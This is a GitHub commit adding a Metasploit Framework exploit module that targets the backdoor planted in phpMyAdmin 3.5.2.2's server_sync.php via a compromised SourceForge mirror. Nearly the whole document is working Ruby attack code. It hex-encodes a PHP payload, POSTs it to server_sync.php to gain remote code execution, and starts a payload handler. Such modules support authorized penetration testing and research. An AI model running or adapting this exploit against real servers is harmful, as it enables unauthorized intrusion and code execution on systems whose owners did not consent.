Permalink
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
with
82 additions
and 0 deletions.
| @@ -0,0 +1,82 @@ | ||
| ## | ||
| # $Id$ | ||
| ## | ||
|
|
||
| ## | ||
| # This file is part of the Metasploit Framework and may be subject to | ||
| # redistribution and commercial restrictions. Please see the Metasploit | ||
| # web site for more information on licensing and terms of use. | ||
| # http://metasploit.com/ | ||
| ## | ||
|
|
||
| require 'msf/core' | ||
|
|
||
| class Metasploit3 < Msf::Exploit::Remote | ||
| Rank = NormalRanking | ||
|
|
||
| include Msf::Exploit::Remote::Tcp | ||
| include Msf::Exploit::Remote::HttpClient | ||
|
|
||
| def initialize(info = {}) | ||
| super(update_info(info, | ||
| 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', | ||
| 'Description' => %q{ | ||
| This module exploits an arbitrary code execution backdoor | ||
| placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. | ||
| }, | ||
| 'Author' => [ 'hdm' ], | ||
| 'License' => MSF_LICENSE, | ||
| 'Version' => '$Revision$', | ||
| 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ], | ||
| 'Privileged' => false, | ||
| 'Payload' => | ||
| { | ||
| 'DisableNops' => true, | ||
| 'Compat' => | ||
| { | ||
| 'ConnectionType' => 'find', | ||
| }, | ||
| # Arbitrary big number. The payload gets sent as an HTTP | ||
| # response body, so really it's unlimited | ||
| 'Space' => 262144, # 256k | ||
| }, | ||
| 'DefaultOptions' => | ||
| { | ||
| 'WfsDelay' => 30 | ||
| }, | ||
| 'DisclosureDate' => 'Sep 25 2012', | ||
| 'Platform' => 'php', | ||
| 'Arch' => ARCH_PHP, | ||
| 'Targets' => [[ 'Automatic', { }]], | ||
| 'DefaultTarget' => 0)) | ||
|
|
||
| register_options([ | ||
| OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin']) | ||
| ], self.class) | ||
| end | ||
|
|
||
| def exploit | ||
|
|
||
| uris = [] | ||
|
|
||
| tpath = datastore['PATH'] | ||
| if tpath[-1,1] == '/' | ||
| tpath = tpath.chop | ||
| end | ||
|
|
||
| pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%") | ||
|
|
||
| res = send_request_raw( { | ||
| 'global' => true, | ||
| 'uri' => tpath + "/server_sync.php", | ||
| 'method' => 'POST', | ||
| 'data' => pdata, | ||
| 'headers' => { | ||
| 'Content-Type' => 'application/x-www-form-urlencoded', | ||
| 'Content-Length' => pdata.length, | ||
| } | ||
| }, 1.0) | ||
|
|
||
| handler | ||
| end | ||
| end |